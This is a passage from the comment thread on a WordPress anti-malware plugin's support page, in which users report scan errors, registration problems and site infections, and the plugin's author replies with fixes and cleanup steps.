        did you ever find this problem? I have it too :(

        Reply
        • On January 11, 2013 at 10:08 am, Anti-Malware Admin said:

          Heru never responded to me. If you are willing to give me access to you WP Admin then I will track this down for you, and add it to my definitions so that it can be automatically removed.

          Reply
          • On January 11, 2013 at 2:46 pm, Myles said:

            I found the problem. If you are logged into WordPress go to Appearance>Editor> on the right hand side click on “Theme Functions” (functions.php) > “click ctrl f” on your keyboard to bring up the search tab on the upper right hand side of your panel > search for smuss.net (or whatever website the “here” link brings you too.) I’m talking about the “here” link that we are trying to get rid of on our pages> The search will bring you to a URL. Mine brought me to “http://smuss.net/jquery-1.6.3.min.js” > delete the entire URL between the “” but leave the “” and update the page. Then the problem will be fixed.

            If you are not logged into wordpress extract your theme in a folder > open the theme folder > right click on functions.php > open file with notepad > scroll to the bottom of the page > look about 15 lines up for the URL and delete it > click “save” under “file” in the menu > close the notepad. Then the problem will be fixed. If you do not see the URL near the bottom (aprox 15 lines up) then you will have to search for it in this file and delete it.

            This took me awhile today to track down and fix so I hope this helps someone else other than me :)

  • On December 30, 2012 at 8:25 am, Jarrod Bassin said:

    I just downloaded and installed the plugin. Sucuri.net scans have revealed multiple malware threats whereas the MLS plugin does not seem to find these threats. Also, when I run a scan on the publc_html, the scan seems to be running for several minutes and then it just stops. All the while, the percent complete indicator remains at zero. Any idea what might be happening?

    Reply
    • On December 31, 2012 at 12:22 am, Anti-Malware Admin said:

      Thanks for providing WP Admin credentials to your site. I was able to figure out why is was not finishing the scan. First, it looks like you’ve got 20+ domains installed under the main site’s public_html directory, so the Quick Scan is not an viable option. Second, you have at least one symbolic link to the public_html directory inside the public_html directory, this causes infinite recursion when drilling down through the directory structure (in order to understand recursion you must first understand recursion) ;-)
      I have added the public_html directory to the exclude path so that it will not be followed a second time through. I also add the wp-snapshots directory to the exclude path just to save time. It will now scan over 5,500 folders including all those other domains but it will take some time to do a Complete Scan.

      Reply
  • On December 15, 2012 at 12:38 pm, Jeff said:

    Eli is AMAZING.

    I reached out to him with a malware problem on one of my sites and an hour later he was in it searching for the culprit. 30 minutes later problem solved and a plugin update on the way.

    Where do you get this kind of customer service for a free plugin? As I said AMAZING!

    Eli you have a fan, a friend and a donor for life.

    Mahalo

    Jeff

    Reply
  • On December 15, 2012 at 12:11 pm, Glenn Pelupessy said:

    I want to skip some files, but I can’t edit ‘Skip files with the following extentions’. If I remove the standardextentions ‘png,jpg,jpeg,gif,bmp,tif,tiff,exe,zip,pdf’ the plugin still scans these extentions. Please help.

    Reply
    • On January 5, 2013 at 6:30 pm, Anti-Malware Admin said:

      You will want to skip any binary files as they are generally larger then ascii files and do not contain any scripts. I had designed it so that you could not completely clear this field, assuming that you would always need to exclude something. I have, however, fixed it so that you can now clear this field and scan all files. Keep in mind it will likely be a waste of time to scan binary files for malicious text patterns.

      Reply
  • On October 14, 2012 at 7:34 am, Silvano Ginepri said:

    Hi there
    my site crashed twice now during the scan-<i still have 2 alerts.What could be the cause. Before I deactivate the plugin I would like know what you suggest
    Silgin

    Reply
    • On October 14, 2012 at 12:21 pm, Anti-Malware Admin said:

      These 2 “Alerts” you are talking about are from Sucuri.net and they are cached from 2 days ago. I just had Sucuri refresh their cache by clicking “Re-Scan” on their site and the results confirmed that your site is now clean.

      Reply
  • On October 10, 2012 at 12:34 am, Firat Öztürk said:

    i got something like this

    “Warning: set_time_limit() has been disabled for security reasons in…”

    What should i do? Is this a problem or just an unimportant info?

    Thanks

    Reply
    • On October 10, 2012 at 6:49 am, Anti-Malware Admin said:

      It’s not something to worry about. I am setting the timeout to 60 seconds in a recursive loop so that it does not get stock in some part of that scan process. Your server’s security settings seem to be stopping me from setting that value.
      I will suppress this error in my next release by changing set_time_limit to @set_time_limit. You can add the @ to your version if you want to suppress these errors now.

      Reply
  • On September 27, 2012 at 5:32 am, Lane Lester said:

    The plugin says my number is not registered, but your site says it is. I’ve logged on with the password you supplied. I’ve reloaded the plugin page, but no change.

    Lane

    Reply
    • On September 27, 2012 at 5:53 am, Anti-Malware Admin said:

      Somehow your site was registered in my database without a trailing ‘/’ (slash). I have corrected this error in my database so it should work for you now.

      Thanks for contacting me about this issue. Please let me know if there is anything else I can do.

      Reply
      • On September 27, 2012 at 6:40 am, Lane Lester said:

        Thanks, that seems to have fixed it. It doesn’t say I’m registered, but at least it no longer says I’m not!

        The search for updates, plugin and definitions is taking forever, but maybe your server is overloaded.

        I did a scan of plugins, and out of 1131 files, it found 59 potentials in 9 different plugins. These are plugins I’ve used for a long time.

        Reply
        • On September 27, 2012 at 10:50 am, Anti-Malware Admin said:

          It should say “Your Installation Key is Registered” in green letters in the Definition Updates section on the right. It should also say “Your Definitions file is current” below that. You want to make sure that you have downloaded the latest definitions. Then you want to scan your whole site (not just the plugins directory).

          I wouldn’t worry about those “Potential Threats” in Yellow, it’s just the ones in Red you should repair.

          Reply
          • On September 27, 2012 at 12:56 pm, Lane Lester said:

            Yes, when the definition update finished, it did display the above.

            Unfortunately, when I did a wp-content scan, it listed a bunch of files from one plugin in red. This is a very valuable auto-blogging plugin, and I wouldn’t want to do anything to harm it unnecessarily. What does repairing involve?

            Trying to do a public_html scan, I got this error: Fatal error: Maximum execution time of 30 seconds exceeded in /home/thewebdr/public_html/wp-content/plugins/gotmls/index.php on line 82

            I had seen that in the wp-content scan, and I added to a php.ini in public_html:
            max_execution_time = 600
            I don’t know why it’s not taking effect.

          • On September 27, 2012 at 1:16 pm, Anti-Malware Admin said:

            My plugin was designed to remove the threat from an infected file without breaking the file. Admittedly it’s not always 100% effective and I have had a couple of False Positives in the past. So, make a backup of the plugin and then run the Automatic Repair and see what happens. There is also a link to revert the changes if it dies break something.

            There are also two lines in a recursive loop within plugins/gotmls/images.php (lines 244 and 276) where you would need to change
            set_time_limit(30);
            to a higher number.

  • On September 18, 2012 at 9:59 pm, Zak said:

    I Have found 6 potential threats what’s next?

    Reply
  • On September 18, 2012 at 2:52 am, Martin Hjelte said:

    Hi,

    just donated and didn’t write the sites name. Is it registered some how anyway?

    Thanks!

    Reply
    • On September 18, 2012 at 7:00 am, Anti-Malware Admin said:

      Yes. Donating from your WP-Admin will pass along your Installation Key for my plugin. I see that your donation is associated with your site name.

      Reply
  • On September 17, 2012 at 5:59 pm, Ranjan Selvan said:

    Hi

    my site http://www.tradeexpressions.com.sg is infected by malware. i have scanned using this plugin and confirmed. Please tell me how to remove all those.

    Thanks
    Selvan

    Reply
    • On September 17, 2012 at 7:18 pm, Anti-Malware Admin said:

      If my plugin finds “Know Threats” (in red) you should see a button that says “Repair SELECTED files Now”.

      If all you are finding is “Potential Threats” (in yellow) then please send me a screenshot and I’ll see if anything stick out at me as suspicious.

      Reply
  • On September 14, 2012 at 3:22 am, Will Chapman said:

    Once again your great plugin spotted malware on several of my sites and then removed it. I’m just waiting to see if it sneeks back in again but meanwhile although I’ve already made a modest donation I’ve decided to make another one each time another infection is spotted.

    Cheers and keep up the good work.

    Regards

    Will Chapman

    Reply
    • On September 14, 2012 at 7:25 am, Anti-Malware Admin said:

      Thanks the donating again, I like that philosophy.

      Let me know it they come back and I can take a look (maybe figure out how they got in).

      Reply
  • On May 7, 2012 at 1:17 pm, Lissa Ingram said:

    Hi, I love the plugin, but I run multiple sites, and it’s not letting me use the plugin on site 2 with the same email address I used for site 1. Is there a developer’s package, or some way to do this? I use the same admin email for all of the sites. I did donate! Thanks!

    Reply
    • On May 7, 2012 at 8:32 pm, Anti-Malware Admin said:

      I am working on supporting multiple domains registered under one email account. As a test I have manually registered another one of your domains under the same account you already have (the one I added is the same one you use as your email address). If you install my GOTMLS Plugin on that domain you should see that it is already registered. You should also see that it has the ability to scan one level higher in your directory hierarchy. Hopefully this will enable you to scan all your domains on that server from one WP Admin. Please let me know if this works for you as desired or if you have any problems.

      Reply
      • On May 7, 2012 at 11:22 pm, pubblivori veloci said:

        I’ve the sme problem. I manage 40 no profit plogs and I would like to protect all with your plugin but seems only one could be registered with an email adress. a Pity!

        Reply
        • On May 10, 2012 at 3:14 pm, Anti-Malware Admin said:

          I have changed the registration process on gotmls.net to accept multiple site/key registrations under a single email address. Give it a try and let me know how it works for you.

          Reply
          • On October 10, 2013 at 10:37 am, Bill Sutton said:

            I’m having a problem here too. I currently have two sites registered with gotmls.net (and I’ve donated!). But I can’t figure out how to add another site. There’s no way to do it after you’ve logged in.

            Can you help?

          • On October 10, 2013 at 10:48 am, Anti-Malware Admin said:

            The best way to register any site is to install the plugin on that site and then use the built-in registration for on the Anti-Malware Settings page in the WP-Admin of the site you want to register. If you use the same email address on the form as you did on the registration for your other sites then all your site will be registered under the same account. If you already registered the new site under a different email then you can login to that account on gotmls.net and transfer that site’s registration to your other account so that they are all together.

  • On April 6, 2012 at 11:22 am, Art Golombek said:

    Hi Eli:
    I just downloaded your latest version 1.2.04.04 and the following two warnings are on the dashboard for the plugin:

    Warning: array_merge() [function.array-merge]: Argument #1 is not an array in …/wp-content/plugins/gotmls/index.php on line 432

    Warning: implode() [function.implode]: Invalid arguments passed in …/wp-content/plugins/gotmls/index.php on line 470

    When I run the scan, a whole slew of warnings appear about the plugin. Let me know. Thanks, Art

    Reply
  • On October 28, 2013 at 12:01 pm, Anti-Malware Admin said:

    Usually the Potential Threats are ok. If you find Known Threats and remove them then you site will likely come up clean. You can request a review from Google in your Webmaster Tools account if you are still getting warnings from the search engine.

    Reply
  • On October 28, 2013 at 6:39 pm, Adrianne George said:

    The warning from Google is gone! You are a genious. I am now telling everyone in my vast networks on Facebook, LinkedIn, XING and Twitter to download your plug in, pronto!

    Reply
  • On March 22, 2018 at 7:20 am, Daniel Bazaes said:

    it´s done and all is working perfect thank you :)

    Reply
  • On October 9, 2018 at 4:50 am, Ricardo Bellizzi said:

    I found this on some pages that are supposed to be completely blank:

    &nbsp;

    Reply
  • On October 9, 2018 at 5:09 pm, Anti-Malware Admin said:

    That is just the HTML code for a [SPACE] so it is not malicious or anything you should be worrying about (the WordPress Post Editor will insert that code by default when it thing it is needed).

    Reply
  • On August 9, 2021 at 12:31 pm, Mario Alberto said:

    Muchísimas gracias. Works.

    Reply

Leave a Reply

Your email address will not be published. Required fields are marked *

*

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>